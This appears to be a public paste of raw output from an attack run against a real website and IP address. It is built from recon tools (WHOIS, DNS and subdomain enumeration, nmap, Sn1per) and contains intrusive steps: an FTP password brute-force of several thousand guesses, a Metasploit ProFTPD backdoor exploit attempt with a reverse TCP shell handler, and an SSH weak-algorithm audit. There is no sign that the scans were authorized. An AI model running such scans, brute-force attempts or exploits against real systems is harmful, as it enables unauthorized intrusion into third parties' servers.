Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #######################################################################################################################################
- Hostname cv2.dreamcaster.info ISP Quasi Networks LTD. (AS29073)
- Continent Africa Flag
- SC
- Country Seychelles Country Code SC (SYC)
- Region Unknown Local time 30 Sep 2017 06:30 +04
- City Unknown Latitude -4.583
- IP Address 80.82.69.63 Longitude 55.667
- #######################################################################################################################################
- HunterUnit JTSEC full Recon Anonymous #2
- [i] Scanning Site: http://cv2.dreamcaster.info
- B A S I C I N F O
- ====================
- [+] Site Title: CandyViVa - Candid Video Vault - ARCHIVE 2
- [+] IP address: 80.82.69.63
- [+] Web Server: Apache/2
- [+] CMS: Could Not Detect
- [+] Cloudflare: Not Detected
- [+] Robots File: Could NOT Find robots.txt!
- G E O I P L O O K U P
- =========================
- [i] IP Address: 80.82.69.63
- [i] Country: SC
- [i] State: N/A
- [i] City: N/A
- [i] Latitude: -4.583300
- [i] Longitude: 55.666698
- H T T P H E A D E R S
- =======================
- [i] HTTP/1.1 200 OK
- [i] Date: Sat, 30 Sep 2017 02:38:17 GMT
- [i] Server: Apache/2
- [i] Last-Modified: Mon, 14 Feb 2011 17:14:43 GMT
- [i] ETag: "17a3-49c412f0c86c0"
- [i] Accept-Ranges: bytes
- [i] Content-Length: 6051
- [i] Vary: Accept-Encoding,User-Agent
- [i] Connection: close
- [i] Content-Type: text/html
- D N S L O O K U P
- ===================
- cv2.dreamcaster.info. 14397 IN A 80.82.69.63
- S U B N E T C A L C U L A T I O N
- ====================================
- Address = 80.82.69.63
- Network = 80.82.69.63 / 32
- Netmask = 255.255.255.255
- Broadcast = not needed on Point-to-Point links
- Wildcard Mask = 0.0.0.0
- Hosts Bits = 0
- Max. Hosts = 1 (2^0 - 0)
- Host Range = { 80.82.69.63 - 80.82.69.63 }
- N M A P P O R T S C A N
- ============================
- Starting Nmap 7.01 ( https://nmap.org ) at 2017-09-30 02:31 UTC
- Nmap scan report for cv2.dreamcaster.info (80.82.69.63)
- Host is up (0.083s latency).
- rDNS record for 80.82.69.63: jademonitor.net
- PORT STATE SERVICE VERSION
- 21/tcp open ftp ProFTPD
- 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
- 23/tcp closed telnet
- 25/tcp open smtp Exim smtpd 4.84
- 80/tcp open http?
- 110/tcp open pop3 Dovecot DirectAdmin pop3d
- 143/tcp open imap Dovecot imapd
- 443/tcp open ssl/https?
- 445/tcp closed microsoft-ds
- 3389/tcp closed ms-wbt-server
- 2
- S U B - D O M A I N F I N D E R
- ==================================
- [i] Total Subdomains Found : 1
- [+] Subdomain: cv2.dreamcaster.info
- [-] IP: 80.82.69.63
- [*] Performing TLD Brute force Enumeration against cv2.dreamcaster.info
- [*] The operation could take up to: 00:01:07
- [*] A cv2.biz.af 5.45.75.45
- [*] CNAME cv2.biz.at free.biz.at
- [*] A free.biz.at 216.92.134.29
- [*] A cv2.co.asia 91.195.240.135
- [*] A cv2.com.ax 185.55.85.123
- [*] A cv2.org.aw 142.4.20.12
- [*] A cv2.org.ax 185.55.85.123
- [*] A cv2.co.ba 176.9.45.78
- [*] A cv2.com.ba 195.222.33.180
- [*] A cv2.com.be 95.173.170.166
- [*] A cv2.biz.by 71.18.52.2
- [*] A cv2.biz.bz 199.59.242.150
- [*] A cv2.ca 54.225.108.200
- [*] A cv2.ca 50.19.253.20
- [*] A cv2.ca 50.17.208.250
- [*] A cv2.ca 54.225.133.127
- [*] A cv2.ca 50.17.233.190
- [*] A cv2.ca 50.16.251.65
- [*] A cv2.ca 54.197.234.71
- [*] A cv2.ca 50.19.107.142
- [*] A cv2.com.cc 54.252.107.64
- [*] A cv2.net.cc 54.252.89.206
- [*] A cv2.co.cc 175.126.123.219
- [*] A cv2.org.ch 72.52.4.122
- [*] A cv2.cl 192.186.207.228
- [*] A cv2.co.cm 85.25.140.105
- [*] A cv2.net.cm 85.25.140.105
- [*] A cv2.biz.cl 185.53.178.8
- [*] A cv2.co 50.63.202.1
- [*] CNAME cv2.biz.cm i.cns.cm
- [*] A i.cns.cm 118.184.56.30
- [*] A cv2.com 208.53.48.42
- [*] A cv2.com.com 52.33.196.199
- [*] A cv2.net.com 199.59.242.150
- [*] A cv2.co.com 173.192.115.17
- [*] A cv2.org.com 23.23.86.44
- [*] A cv2.biz.cr 72.52.4.122
- [*] A cv2.biz.cx 72.52.4.122
- [*] A cv2.net.cz 80.250.24.177
- [*] A cv2.cz 46.28.105.2
- [*] AAAA cv2.cz 2a02:2b88:1:4::16
- [*] A cv2.biz.cz 185.53.179.7
- [*] A cv2.com.cz 62.109.128.30
- [*] A cv2.com.de 50.56.68.37
- [*] CNAME cv2.co.de co.de
- [*] A co.de 144.76.162.245
- [*] CNAME cv2.org.de www.org.de
- [*] A www.org.de 78.47.128.8
- [*] A cv2.de 178.77.101.205
- [*] A cv2.dk 81.95.242.59
- [*] A cv2.net.eu 78.46.90.98
- [*] A cv2.org.eu 78.46.90.98
- [*] A cv2.fi 84.234.64.240
- [*] A cv2.biz.fi 185.55.85.123
- [*] CNAME cv2.com.fi dnspod-vip3.mydnspod.net
- [*] A dnspod-vip3.mydnspod.net 119.28.48.237
- [*] A dnspod-vip3.mydnspod.net 119.28.48.218
- [*] A cv2.fm 173.230.131.38
- [*] A cv2.biz.fm 173.230.131.38
- [*] A cv2.org.fr 149.202.133.35
- [*] A cv2.biz.gl 72.52.4.122
- [*] CNAME cv2.co.gp co.gp
- [*] A co.gp 144.76.162.245
- [*] A cv2.co.hn 208.100.40.203
- [*] CNAME cv2.net.hr net.hr
- [*] A net.hr 192.0.78.25
- [*] A net.hr 192.0.78.24
- [*] A cv2.co.ht 72.52.4.122
- [*] A cv2.id 203.119.112.50
- [*] CNAME cv2.biz.hn parkmydomain.vhostgo.com
- [*] CNAME parkmydomain.vhostgo.com westuser.dopa.com
- [*] A westuser.dopa.com 107.186.245.119
- [*] A cv2.im 173.236.27.43
- [*] A cv2.in 162.215.252.78
- [*] A cv2.info 212.227.247.14
- [*] AAAA cv2.info 2001:8d8:1001:6009:74f9:75be:dbb6:a000
- [*] A cv2.io 64.68.200.44
- [*] A cv2.ir 77.238.121.16
- [*] A cv2.it 185.19.185.41
- [*] A cv2.co.jobs 50.17.193.222
- [*] A cv2.com.jobs 50.19.241.165
- [*] A cv2.net.jobs 50.19.241.165
- [*] A cv2.biz.jobs 50.19.241.165
- [*] A cv2.org.jobs 50.19.241.165
- [*] A cv2.biz.ky 199.184.144.27
- [*] A cv2.la 173.230.141.80
- [*] CNAME cv2.biz.li 712936.parkingcrew.net
- [*] A 712936.parkingcrew.net 185.53.179.29
- [*] A cv2.biz.lu 195.26.5.2
- [*] A cv2.biz.ly 64.136.20.39
- [*] A cv2.biz.md 72.52.4.122
- [*] A cv2.co.mk 87.76.31.211
- [*] A cv2.co.mobi 54.225.105.179
- [*] A cv2.com.my 103.1.148.33
- [*] A cv2.biz.my 202.190.174.44
- [*] A cv2.net 84.234.64.242
- [*] A cv2.net.net 52.50.81.210
- [*] A cv2.co.net 188.166.216.219
- [*] A cv2.org.net 23.23.86.44
- [*] A cv2.nl 72.52.4.119
- [*] A cv2.co.nl 37.97.184.204
- [*] A cv2.com.nl 83.98.157.102
- [*] A cv2.net.nl 83.98.157.102
- [*] A cv2.no 31.24.135.1
- [*] CNAME cv2.co.nu co.nu
- [*] A co.nu 144.76.162.245
- [*] CNAME cv2.com.nu com.nu
- [*] A com.nu 144.76.162.245
- [*] A cv2.org.nu 80.92.84.139
- [*] A cv2.co.nr 208.100.40.202
- [*] A cv2.net.nu 199.102.76.78
- [*] CNAME cv2.net.org pewtrusts.org
- [*] A pewtrusts.org 204.74.99.100
- [*] A cv2.org 136.243.2.69
- [*] A cv2.com.org 23.23.86.44
- [*] A cv2.co.nz 203.96.152.10
- [*] A cv2.ph 45.79.222.138
- [*] A cv2.co.ph 45.79.222.138
- [*] A cv2.com.ph 45.79.222.138
- [*] A cv2.net.ph 45.79.222.138
- [*] A cv2.org.ph 45.79.222.138
- [*] A cv2.org.pm 208.73.210.217
- [*] A cv2.org.pm 208.73.211.177
- [*] A cv2.org.pm 208.73.211.165
- [*] A cv2.org.pm 208.73.210.202
- [*] A cv2.co.pl 212.91.6.55
- [*] A cv2.co.ps 66.96.132.56
- [*] CNAME cv2.biz.ps biz.ps
- [*] A biz.ps 144.76.162.245
- [*] A cv2.pw 141.8.226.58
- [*] A cv2.co.pt 194.107.127.52
- [*] A cv2.net.pw 141.8.226.59
- [*] A cv2.co.pw 141.8.226.59
- [*] A cv2.biz.pw 141.8.226.59
- [*] A cv2.org.pw 141.8.226.59
- [*] A cv2.org.re 217.70.184.38
- [*] A cv2.net.ro 69.64.52.127
- [*] CNAME cv2.co.ro now.co.ro
- [*] A now.co.ro 185.27.255.9
- [*] A cv2.com.ru 178.210.89.119
- [*] A cv2.biz.se 185.53.179.6
- [*] A cv2.se 194.30.169.60
- [*] CNAME cv2.net.se 773147.parkingcrew.net
- [*] A 773147.parkingcrew.net 185.53.179.29
- [*] A cv2.co.sl 91.195.240.135
- [*] A cv2.com.sr 143.95.106.249
- [*] A cv2.co.su 72.52.4.122
- [*] A cv2.biz.st 91.121.28.115
- [*] A cv2.su 91.218.115.152
- [*] A cv2.biz.tc 64.136.20.39
- [*] A cv2.biz.tf 85.236.153.18
- [*] A cv2.net.tf 188.40.70.29
- [*] A cv2.net.tf 188.40.117.12
- [*] A cv2.net.tf 188.40.70.27
- [*] A cv2.co.tl 208.100.40.202
- [*] A cv2.co.to 175.118.124.44
- [*] A cv2.co.tv 31.186.25.163
- [*] A cv2.biz.tv 72.52.4.122
- [*] A cv2.org.tv 72.52.4.122
- [*] A cv2.co.uk 109.239.101.52
- [*] CNAME cv2.biz.uz biz.uz
- [*] A biz.uz 144.76.162.245
- [*] A cv2.vg 88.198.29.97
- [*] A cv2.co.vg 88.198.29.97
- [*] A cv2.com.vg 88.198.29.97
- [*] A cv2.net.vg 68.178.254.180
- [*] A cv2.biz.vg 89.31.143.20
- [*] A cv2.ws 64.70.19.203
- [*] A cv2.com.ws 202.4.48.211
- [*] A cv2.net.ws 202.4.48.211
- [*] A cv2.org.ws 202.4.48.211
- [*] A cv2.biz.ws 184.168.221.104
- % The objects are in RPSL format.
- %
- % The RIPE Database is subject to Terms and Conditions.
- % See http://www.ripe.net/db/support/db-terms-conditions.pdf
- % Note: this output has been filtered.
- % To receive output for a database update, use the "-B" flag.
- % Information related to '80.82.69.0 - 80.82.69.255'
- % Abuse contact for '80.82.69.0 - 80.82.69.255' is 'abuse@quasinetworks.com'
- inetnum: 80.82.69.0 - 80.82.69.255
- netname: SC-QUASI75
- descr: QUASI
- country: SC
- org: ORG-QNL3-RIPE
- admin-c: QNL1-RIPE
- tech-c: QNL1-RIPE
- status: ASSIGNED PA
- mnt-by: QUASINETWORKS-MNT
- mnt-lower: QUASINETWORKS-MNT
- mnt-routes: QUASINETWORKS-MNT
- created: 2016-01-23T22:52:22Z
- last-modified: 2016-01-23T22:52:22Z
- source: RIPE
- organisation: ORG-QNL3-RIPE
- org-name: Quasi Networks LTD.
- org-type: OTHER
- address: Suite 1, Second Floor
- address: Sound & Vision House, Francis Rachel Street
- address: Victoria, Mahe, SEYCHELLES
- remarks: *****************************************************************************
- remarks: IMPORTANT INFORMATION
- remarks: *****************************************************************************
- remarks: We are a high bandwidth network provider offering bandwidth solutions.
- remarks: Government agencies can sent their requests to gov.request@quasinetworks.com
- remarks: Please only use abuse@quasinetworks.com for abuse reports.
- remarks: For all other requests, please see the details on our website.
- remarks: *****************************************************************************
- abuse-mailbox: abuse@quasinetworks.com
- abuse-c: AR34302-RIPE
- mnt-ref: QUASINETWORKS-MNT
- mnt-by: QUASINETWORKS-MNT
- created: 2015-11-08T22:25:26Z
- last-modified: 2015-11-27T09:37:50Z
- source: RIPE # Filtered
- role: Quasi Networks LTD
- address: Suite 1, Second Floor
- address: Sound & Vision House, Francis Rachel Street
- address: Victoria, Mahe, SEYCHELLES
- remarks: *****************************************************************************
- remarks: IMPORTANT INFORMATION
- remarks: *****************************************************************************
- remarks: We are a high bandwidth network provider offering bandwidth solutions.
- remarks: Government agencies can sent their requests to gov.request@quasinetworks.com
- remarks: Please only use abuse@quasinetworks.com for abuse reports.
- remarks: For all other requests, please see the details on our website.
- remarks: *****************************************************************************
- abuse-mailbox: abuse@quasinetworks.com
- nic-hdl: QNL1-RIPE
- mnt-by: QUASINETWORKS-MNT
- created: 2015-11-07T22:43:04Z
- last-modified: 2015-11-07T23:04:49Z
- source: RIPE # Filtered
- % Information related to '80.82.69.0/24AS29073'
- route: 80.82.69.0/24
- descr: Quasi Networks LTD (IBC)
- origin: AS29073
- mnt-by: QUASINETWORKS-MNT
- created: 2010-11-30T12:05:14Z
- last-modified: 2016-01-23T22:52:39Z
- source: RIPE
- % This query was served by the RIPE Database Query Service version 1.89.2 (HEREFORD)
- + -- --=[http://crowdshield.com
- + -- --=[sniper v2.8 by 1N3
- + -- ----------------------------=[Running Nslookup]=------------------------ -- +
- Server: 192.168.1.254
- Address: 192.168.1.254#53
- Non-authoritative answer:
- Name: cv2.dreamcaster.info
- Address: 80.82.69.63
- cv2.dreamcaster.info has address 80.82.69.63
- + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
- Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
- [+] Target is cv2.dreamcaster.info
- [+] Loading modules.
- [+] Following modules are loaded:
- [x] [1] ping:icmp_ping - ICMP echo discovery module
- [x] [2] ping:tcp_ping - TCP-based ping discovery module
- [x] [3] ping:udp_ping - UDP-based ping discovery module
- [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
- [x] [5] infogather:portscan - TCP and UDP PortScanner
- [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
- [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
- [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
- [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
- [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
- [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
- [x] [12] fingerprint:smb - SMB fingerprinting module
- [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
- [+] 13 modules registered
- [+] Initializing scan engine
- [+] Running scan engine
- [-] ping:tcp_ping module: no closed/open TCP ports known on 80.82.69.63. Module test failed
- [-] ping:udp_ping module: no closed/open UDP ports known on 80.82.69.63. Module test failed
- [-] No distance calculation. 80.82.69.63 appears to be dead or no ports known
- [+] Host: 80.82.69.63 is up (Guess probability: 50%)
- [+] Target: 80.82.69.63 is alive. Round-Trip Time: 0.49563 sec
- [+] Selected safe Round-Trip Time value is: 0.99126 sec
- [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
- [-] fingerprint:smb need either TCP port 139 or 445 to run
- [-] fingerprint:snmp: need UDP port 161 open
- [+] Primary guess:
- [+] Host 80.82.69.63 Running OS: ����U (Guess probability: 95%)
- [+] Other guesses:
- [+] Host 80.82.69.63 Running OS: ����U (Guess probability: 95%)
- [+] Host 80.82.69.63 Running OS: ����U (Guess probability: 95%)
- [+] Host 80.82.69.63 Running OS: ����U (Guess probability: 95%)
- [+] Host 80.82.69.63 Running OS: ����U (Guess probability: 95%)
- [+] Host 80.82.69.63 Running OS: ����U (Guess probability: 95%)
- [+] Host 80.82.69.63 Running OS: ����U (Guess probability: 95%)
- [+] Host 80.82.69.63 Running OS: ����U (Guess probability: 95%)
- [+] Host 80.82.69.63 Running OS: ����U (Guess probability: 95%)
- [+] Host 80.82.69.63 Running OS: ����U (Guess probability: 95%)
- [+] Cleaning up scan engine
- [+] Modules deinitialized
- [+] Execution completed.
- + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
- NOT FOUND
- >>> Last update of WHOIS database: 2017-09-30T02:31:02Z <<<
- Access to AFILIAS WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the Afilias registry database. The data in this record is provided by Afilias Limited for informational purposes only, and Afilias does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to(a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Afilias reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
- + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
- *******************************************************************
- * *
- * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
- * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
- * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
- * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
- * *
- * TheHarvester Ver. 2.7 *
- * Coded by Christian Martorella *
- * Edge-Security Research *
- * cmartorella@edge-security.com *
- *******************************************************************
- [-] Searching in Bing:
- Searching 50 results...
- Searching 100 results...
- [+] Emails found:
- ------------------
- No emails found
- [+] Hosts found in search engines:
- ------------------------------------
- [-] Resolving hostnames IPs...
- + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
- ; <<>> DiG 9.10.3-P4-Debian <<>> -x cv2.dreamcaster.info
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14401
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; udp: 4096
- ;; QUESTION SECTION:
- ;info.dreamcaster.cv2.in-addr.arpa. IN PTR
- ;; AUTHORITY SECTION:
- in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017043204 1800 900 604800 3600
- ;; Query time: 35 msec
- ;; SERVER: 192.168.1.254#53(192.168.1.254)
- ;; WHEN: Fri Sep 29 22:32:18 EDT 2017
- ;; MSG SIZE rcvd: 130
- Smartmatch is experimental at /usr/bin/dnsenum line 698.
- Smartmatch is experimental at /usr/bin/dnsenum line 698.
- dnsenum VERSION:1.2.4
- ----- cv2.dreamcaster.info -----
- Host's addresses:
- __________________
- cv2.dreamcaster.info. 14271 IN A 80.82.69.63
- Name Servers:
- ______________
- cv2.dreamcaster.info NS record query failed: NOERROR
- + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
- ____ _ _ _ _ _____
- / ___| _ _| |__ | (_)___| |_|___ / _ __
- \___ \| | | | '_ \| | / __| __| |_ \| '__|
- ___) | |_| | |_) | | \__ \ |_ ___) | |
- |____/ \__,_|_.__/|_|_|___/\__|____/|_|
- # Coded By Ahmed Aboul-Ela - @aboul3la
- [-] Enumerating subdomains now for cv2.dreamcaster.info
- [-] verbosity is enabled, will show the subdomains results in realtime
- [-] Searching now in Baidu..
- [-] Searching now in Yahoo..
- [-] Searching now in Google..
- [-] Searching now in Bing..
- [-] Searching now in Ask..
- [-] Searching now in Netcraft..
- [-] Searching now in DNSdumpster..
- [-] Searching now in Virustotal..
- [-] Searching now in ThreatCrowd..
- [-] Searching now in SSL Certificates..
- [-] Searching now in PassiveDNS..
- ╔═╗╦═╗╔╦╗╔═╗╦ ╦
- ║ ╠╦╝ ║ ╚═╗╠═╣
- ╚═╝╩╚═ ╩o╚═╝╩ ╩
- + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
- [+] Domains saved to: /usr/share/sniper/loot/domains/domains-cv2.dreamcaster.info-full.txt
- + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
- + -- ----------------------------=[Checking Email Security]=----------------- -- +
- + -- ----------------------------=[Pinging host]=---------------------------- -- +
- PING cv2.dreamcaster.info (80.82.69.63) 56(84) bytes of data.
- 64 bytes from jademonitor.net (80.82.69.63): icmp_seq=1 ttl=58 time=121 ms
- --- cv2.dreamcaster.info ping statistics ---
- 1 packets transmitted, 1 received, 0% packet loss, time 0ms
- rtt min/avg/max/mdev = 121.488/121.488/121.488/0.000 ms
- + -- ----------------------------=[Running TCP port scan]=------------------- -- +
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-29 22:32 EDT
- Nmap scan report for cv2.dreamcaster.info (80.82.69.63)
- Host is up (0.13s latency).
- rDNS record for 80.82.69.63: jademonitor.net
- Not shown: 454 closed ports, 8 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 53/tcp open domain
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 993/tcp open imaps
- 995/tcp open pop3s
- 2222/tcp open EtherNetIP-1
- 3306/tcp open mysql
- Nmap done: 1 IP address (1 host up) scanned in 9.27 seconds
- + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
- + -- --=[Port 21 opened... running tests...
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-29 22:32 EDT
- Nmap scan report for cv2.dreamcaster.info (80.82.69.63)
- Host is up (0.12s latency).
- rDNS record for 80.82.69.63: jademonitor.net
- PORT STATE SERVICE VERSION
- 21/tcp open ftp ProFTPD
- | ftp-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 3830 guesses in 180 seconds, average tps: 21.3
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 2.6.39 (99%), Linux 2.6.32 (94%), Linux 2.6.32 or 3.10 (94%), Linux 3.4 (94%), WatchGuard Fireware 11.8 (94%), Synology DiskStation Manager 5.1 (94%), Linux 2.6.18 - 2.6.22 (94%), Linux 3.10 (94%), Linux 3.1 - 3.2 (93%), Linux 2.6.32 - 2.6.39 (92%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 10 hops
- Service Info: OS: Unix
- TRACEROUTE (using port 21/tcp)
- HOP RTT ADDRESS
- 1 111.54 ms 10.13.0.1
- 2 110.93 ms 37.187.24.252
- 3 111.45 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
- 4 ...
- 5 120.52 ms be100-1109.fra-1-a9.de.eu (213.186.32.213)
- 6 ...
- 7 125.83 ms vlan3555.bb1.ams2.nl.m247.com (176.10.83.128)
- 8 121.86 ms 176.10.83.119
- 9 ...
- 10 121.88 ms jademonitor.net (80.82.69.63)
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 195.70 seconds
- , ,
- / \
- ((__---,,,---__))
- (_) O O (_)_________
- \ _ / |\
- o_o \ M S F | \
- \ _____ | *
- ||| WW|||
- ||| |||
- =[ metasploit v4.16.8-dev ]
- + -- --=[ 1684 exploits - 964 auxiliary - 299 post ]
- + -- --=[ 498 payloads - 40 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- [*] Processing /root/.msf4/msfconsole.rc for ERB directives.
- resource (/root/.msf4/msfconsole.rc)> “spool /root/msf_console.log”
- [-] Unknown command: “spool.
- RHOST => cv2.dreamcaster.info
- RHOSTS => cv2.dreamcaster.info
- [*] cv2.dreamcaster.info:21 - Banner: 220 ProFTPD Server ready.
- [*] cv2.dreamcaster.info:21 - USER: 331 Password required for UHYZa3:)
- [*] Exploit completed, but no session was created.
- [*] Started reverse TCP double handler on 10.13.0.22:4444
- [*] cv2.dreamcaster.info:21 - Sending Backdoor Command
- [-] cv2.dreamcaster.info:21 - Not backdoored
- [*] Exploit completed, but no session was created.
- + -- --=[Port 22 opened... running tests...
- # general
- (gen) banner: SSH-2.0-OpenSSH_5.3
- (gen) software: OpenSSH 5.3
- (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
- (gen) compression: enabled (zlib@openssh.com)
- # key exchange algorithms
- (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
- `- [info] available since OpenSSH 4.4
- (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0
- (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
- (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- # host-key algorithms
- (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
- (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- # encryption algorithms (ciphers)
- (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes192-ctr -- [info] available since OpenSSH 3.7
- (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
- (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
- (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled since Dropbear SSH 0.53
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 2.1.0
- (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
- (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 2.1.0
- (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- # message authentication code algorithms
- (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 4.7
- (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.5.0
- (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.1.0
- (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
- (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
